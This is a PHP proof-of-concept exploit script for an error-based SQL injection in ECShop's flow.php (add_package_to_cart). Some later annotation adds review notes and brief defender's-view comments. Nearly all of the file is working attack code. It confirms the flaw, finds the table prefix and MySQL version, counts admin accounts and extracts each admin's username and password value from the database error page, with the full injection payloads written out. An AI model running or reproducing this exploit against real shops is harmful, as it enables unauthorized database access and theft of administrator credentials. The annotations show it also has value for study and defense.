package.php:
<?php
/*
* P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
*/
// Driver for the PoC. Every stage below is a separate POST to
// flow.php?step=add_package_to_cart with SQL carried inside the
// package_info JSON, and every stage reads its answer out of the
// database error page that the target echoes back (see exploit()).
error_reporting(E_ALL & ~E_WARNING);
ini_set('display_errors', '1');
// No wall-clock limit: the MySQL < 5.0 branches in ucount()/Inject()
// may issue up to 1000 requests each.
@set_time_limit(0);
hr();
banner();
// Requires <host> and <path>; a first argument of "?" also prints usage.
// NOTE(review): usage() is declared with one parameter but is called with
// none here, which on PHP >= 7.1 throws ArgumentCountError instead of
// printing the usage text.
if (count($argv) < 3 || $argv[1]=='?')
{
usage();
exit;
}
hr();
$host = $argv[1];
$path = $argv[2];
// Filled by Inject() through its by-reference parameters, indexed 1..$ucount.
$username = array();
$password = array();
// Stage 1: die()s unless the error-page marker is present in the reply.
exploit($host, $path);
print "Getting database prefix ...\n";
// Stage 2: table prefix, exposed to the later stages as the constant PRE.
$pre = prefix($host, $path);
define('PRE',$pre);
print "Verifying MySQL Version...\n";
// Stage 3: true for >= 5.0 (one request per value), false otherwise
// (ucount()/Inject() then fall back to their retry loops).
$version = version($host, $path);
print "Counting admin user ...\n";
// Stage 4: admin_user row count, as the text matched from the error message.
$ucount = ucount($host, $path,$version);
print "Admin Users : $ucount\n";
// Stage 5: one Inject() call per admin row; $i is 1-based.
for ($i=1;$i<=$ucount;$i++)
{
print "Injecting username and password for admin $i ...\n";
Inject($host, $path,$i,$username[$i],$password[$i],$version);
print "\n";
}
hr();
// Summary of what was collected.
print "*\n";
print "* [+] Target Host : $host$path\n";
print "* [+] Admin Founded : $ucount\n";
print "*\n";
for ($i=1;$i<=$ucount;$i++)
{
print "* [+] Username : " . $username[$i] . "\n";
print "* Passowrd : " . $password[$i] . "\n";
print "*\n";
}
hr();
/**
 * Prints the horizontal rule (one line of asterisks) used to frame the
 * banner, the usage text and the final report.
 */
function hr()
{
    $rule = "****************************************************************************\n";
    echo $rule;
}
/**
 * Prints the four-line exploit banner (title, date, author, contact),
 * one line per entry, exactly as the original listing did.
 */
function banner()
{
    $lines = [
        "* [+] Exploit : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *",
        "* [+] Date : 22-08-2010 *",
        "* [+] Author : alibaba *",
        "* [+] QQ : 1499281192 *",
    ];
    foreach ($lines as $line) {
        echo $line, "\n";
    }
}
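/**
 * Prints the command-line usage block between two rules.
 *
 * @param string|null $argv0 Unused. Made optional so the bare `usage()`
 *                           call at the top of the file no longer raises
 *                           ArgumentCountError (PHP >= 7.1) and the usage
 *                           text is actually shown.
 */
function usage($argv0 = null)
{
    hr();
    print "* [+] Usage : php package.php <host> <path> *\n";
    print "* [+] Example : php package.php www.ecshop.com / *\n";
    print "* [+] Example : php package.php www.ecshop.com /shop/ *\n";
    hr();
}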
/**
 * Stage 1: vulnerability probe.
 *
 * POSTs package_info with a bare single quote appended to package_id and
 * looks for the literal "MySQL server error report" in the raw response,
 * i.e. the text of the target's database error page. Marker absent =>
 * die("No Vulnerability"); marker present => prints "Vulnerability
 * Founded!" and returns.
 *
 * Defender's view: nothing in this script works without that error page,
 * so an install that does not echo database errors to the client gives
 * this stage (and every stage after it) nothing to parse. The quote inside
 * the package_info JSON and the error string in the reply are the two
 * things worth alerting on.
 *
 * NOTE(review): strrpos() returns 0 for a match at byte 0, which `!` would
 * read as "not found"; in practice the HTTP status line always precedes
 * the marker, so the check behaves.
 */
function exploit($host, $path)
{
$url = $path . 'flow.php?step=add_package_to_cart';
$data = 'package_info={"package_id":"1\'","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
die("No Vulnerability");
else
print "Vulnerability Founded!\n";
}
/**
 * Stage 2: discover the table prefix.
 *
 * Re-sends the request with a guess that names `ecs_admin_user`. If the
 * reply carries no error marker, the default prefix 'ecs_' is assumed;
 * otherwise the prefix is parsed out of the query text echoed in the error
 * page ("FROM `db`.`<prefix>package_goods`", capture group 2).
 *
 * @return string 'ecs_', the parsed prefix, or '' when the error page is
 *                present but the regex does not match
 */
function prefix($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
// No error page => keep the default prefix.
if (!strrpos($buffer,"MySQL server error report"))
$pre = 'ecs_';
else
{
// Error page present: the echoed query names the real table, read the prefix from it.
preg_match("/FROM `(.+)`\.`(.+)package_goods`/i",$buffer,$m);
$pre = isset($m[2])? $m[2] : '';
}
return $pre;
}
/**
 * Stage 3: MySQL major-version check.
 *
 * Sends a payload that reads information_schema.tables; the error text
 * "'information_schema.tables' doesn't exist" in the reply is taken to mean
 * the server predates MySQL 5.0. Prints the verdict as a side effect.
 *
 * @return bool true  => >= 5.0: ucount()/Inject() use one request per value
 *              false => <  5.0: ucount()/Inject() fall back to a retry loop
 */
function version($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/\'information_schema.tables\' doesn\'t exist/i",$buffer))
{
print "MySQL Version < 5.0\n";
return false;
}
else
{
print "MySQL Version >= 5.0\n";
return true;
}
}
/**
 * Stage 4: number of rows in <PRE>admin_user.
 *
 * Both branches rely on the reply containing a "Duplicate entry '[N]1' for
 * key" message whose bracketed part is count(user_name), and read N from
 * capture group 1.
 *  - $version true : a single request.
 *  - $version false: the payload uses rand() instead of rand(0), and the
 *    loop re-sends up to 1000 times until the duplicate-entry text shows
 *    up (presumably the unseeded rand() makes the error intermittent —
 *    not verifiable from this file).
 *
 * Defender's view: the count is carried purely by the error text, so
 * suppressing database errors in responses closes this channel too.
 *
 * @param bool $version result of version()
 * @return string the matched count text; if nothing matched, $m is never
 *                set and this yields null (the resulting warning is masked
 *                by the error_reporting() call at the top of the file)
 */
function ucount($host, $path, $version)
{
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer,$m);
}
else
{
// < 5.0 path: keep re-sending until the duplicate-entry text appears, at most 1000 times.
$found = false;
$i=0;
while($found==false && $i<1000)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer))
{
preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
return $m[1];
}
/**
 * Stage 5: fetch one admin_user row (user_name and the password column) by
 * position.
 *
 * $number is the 1-based index printed by the caller and is decremented
 * to the 0-based LIMIT offset. Results are returned through the two
 * by-reference parameters, parsed from "Duplicate entry '[user:password]1'
 * for key" (capture groups 1 and 2). Branching on $version mirrors
 * ucount(): one request when true, up to 1000 retries when false.
 *
 * Whatever the password column holds is copied verbatim into $password;
 * this file does not show how the application stores that column.
 *
 * @param int    $number    1-based admin index
 * @param string &$username receives user_name (reset to '' first)
 * @param string &$password receives the password column value
 * @param bool   $version   result of version()
 *
 * NOTE(review): the < 5.0 branch gates on the one-group regex and then
 * re-matches with the two-group one; if that second match fails, $m[2]
 * is undefined and $password ends up null (warning masked at file top).
 */
function Inject($host, $path, $number, &$username, &$password, $version)
{
// 1-based caller index -> 0-based LIMIT offset.
$number--;
$username = '';
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry \'\[(.+):(.+)\]1\' for key/i",$buffer,$m);
}
else
{
// < 5.0 path: same retry loop as ucount(), capped at 1000 requests.
$found = false;
$i=0;
while($found==false && $i<1000)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry \'\[(.+)\]1\' for key/i",$buffer))
{
preg_match("/Duplicate entry \'\[(.+):(.+)\]1\' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
$username = $m[1];
$password = $m[2];
}
/**
 * Minimal raw HTTP/1.0 POST over a plain TCP socket: no TLS, no redirects,
 * no response parsing.
 *
 * @param string $host    target host name or IP
 * @param int    $port    TCP port (every caller in this file passes 80)
 * @param string $path    request-target placed on the request line as-is
 * @param string $data    form-encoded body, sent unchanged
 * @param int    $timeout connect timeout in seconds, passed to fsockopen()
 * @param string $cookie  accepted for signature compatibility; never sent
 * @return string the entire raw response (status line, headers, body)
 *                collected with fgets() until the peer closes
 *
 * On connect failure the whole script die()s with "<host>/<path> : <errstr><errno>".
 */
function POST($host,$port,$path,$data,$timeout, $cookie='') {
    $response = '';
    $sock = fsockopen($host,$port,$errno,$errstr,$timeout);
    if (!$sock) {
        die($host.'/'.$path.' : '.$errstr.$errno);
    }
    // Same bytes the original wrote with several fputs() calls, built once.
    $request = "POST $path HTTP/1.0\r\n"
        . "Host: $host\r\n"
        . "Content-type: application/x-www-form-urlencoded\r\n"
        . "Content-length: ".strlen($data)."\r\n"
        . "Connection: close\r\n\r\n"
        . $data."\r\n\r\n";
    fwrite($sock, $request);
    // "Connection: close" means the server ends the stream; drain it line by line.
    while(!feof($sock)) {
        $response .= fgets($sock,4096);
    }
    fclose($sock);
    return $response;
}
?>
|